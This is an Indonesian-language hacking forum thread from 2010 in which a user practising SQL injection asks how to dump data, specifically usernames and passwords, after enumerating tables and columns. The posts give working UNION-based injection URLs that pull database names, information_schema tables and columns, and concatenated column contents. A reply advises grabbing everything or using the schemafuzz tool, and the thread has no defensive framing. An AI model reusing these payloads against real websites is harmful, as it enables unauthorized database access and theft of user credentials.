Page 1 of 1

[tanya] ttg SQLi

Posted: Thu Jul 29, 2010 12:17 pm
by princenux
greeting master....
mo tanya dong...
kebetulan lagi latihan SQLi

jadi ada beberapa langkah yg di cek...
database udah OK
table udah OK
column juga udah OK

cuma problemnya gimana cara generate untuk menghasilkan sesuatu...
misalnya gini...
database : main_db
table : tab_1, tab_2, tab_3
column : col_1, col_2, col_3 sampe 50 misalnya...

trus gimana caranya buat generate ?

buat db pake command :

Code: Select all

http://www.example.com/index.php?id=-3+UNION+SELECT+concat(database()),2,3,4,5,6,7--
buat tab pake command :

Code: Select all

http://www.example.com/index.php?id=-3 union select group_concat(table_name),2,3,4,5,6,7 from information_schema.tables where table_schema=database()-- 
buat col pake command :

Code: Select all

http://www.example.com/index.php?id=-3 union select group_concat(column_name),2,3,4,5,6,7 from information_schema.columns where table_schema=database()--
hmmm gimana caranya yah ??

kalo menurut tutorial caranya :

Code: Select all

http://www.example.com/index.php?id=-3 union select 1,group_concat(Columnname,0x3a,columnname,0x3a),2,3,4,5,6,7 from databasename.tablename--
tapi tadikan col nya ada sampe 50... kita pilih satu atau dua aja ? misalnya nama, dan password
trus tablenamenya apa ? kan tadi ada tab 1 sampe 3.. kalo banyak gimana ??

gimana tuh.. ada yg bisa tolongin ?? :cry:

Re: [tanya] ttg SQLi

Posted: Thu Jul 29, 2010 1:08 pm
by peniru
ap yang ditanyakan kk?? ane juga bingung liad yg ditulis :mati: :mati:

Re: [tanya] ttg SQLi

Posted: Thu Jul 29, 2010 1:33 pm
by princenux
hmm yg di tanya itu..
dari table yg banyak dan column yg banyak itu..
gimana querynya biar "dapet"

misalnya nih.. ada user_id sama password
di bagian coloum.. user_id aja ada 2 kali.. password ada password, password2 dan md5password
tapi nanti tablenya yg mana ?

di coba2 aja ?

Re: [tanya] ttg SQLi

Posted: Thu Jul 29, 2010 4:45 pm
by peniru
princenux wrote:hmm yg di tanya itu..
dari table yg banyak dan column yg banyak itu..
gimana querynya biar "dapet"
misalnya nih.. ada user_id sama password y
di bagian coloum.. user_id aja ada 2 kali.. password ada password, password2 dan md5password
tapi nanti tablenya yg mana ?

di coba2 aja ?
hohoho gitu yah... ane juga pernah dapet spelti itu, n ternyata ntu cuman table yang sengaja d buad admin tuk ngecoh rang iseng... hehehehe

yawdah coba ajah ambil semuanya, kan setelah d select colomna muncul semua.. toh,.,,. jadi tinggal copas saja,

ato kalo tidak coba deh pake schemafuzz kalo gk mw ribet... (ane masi d kalangan scriptkiddies) masi cupu.. :devil

Re: [tanya] ttg SQLi

Posted: Thu Jul 29, 2010 5:36 pm
by princenux
hmm case closed deh...
tadi akhirnya pake tools juga... :kaca:
lebih gampang sih.. cuma kurang seru... wehehehe....

thanks lo master... :love: